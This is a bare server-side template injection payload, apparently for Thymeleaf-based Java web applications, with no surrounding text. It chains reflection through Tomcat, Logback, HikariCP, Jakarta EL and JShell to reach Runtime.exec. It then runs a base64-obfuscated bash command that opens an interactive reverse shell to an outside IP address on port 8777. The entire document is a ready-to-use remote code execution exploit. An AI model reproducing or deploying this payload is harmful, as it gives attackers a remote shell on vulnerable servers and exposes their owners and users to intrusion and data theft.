[[${T(org. apache.tomcat.util.IntrospectionUtils).callMethodN(
T(ch.qos.logback.core.util.Loader).loadClass("com.zaxxer.hikari.util.UtilityElf").createInstance("jakarta.el.ELProcessor", T(ch.qos.logback.core.util.Loader).loadClass("jakarta.el.ELProcessor")),
"eval",
new java.lang.String[]{'"".getClass().forName("jdk.jshell.JShell")
.getMethods()[7].invoke("".getClass().forName("jdk.jshell.JShell")).eval("java.lang.Runtime.getRuntime().exec(new java.lang.String[]{\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4xNDAuMTk4LjQ1Lzg3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}\"})")'},
T(org. apache.el.util.ReflectionUtil).toTypeArray(new java.lang.String[]{"java.lang.String"})
)}]]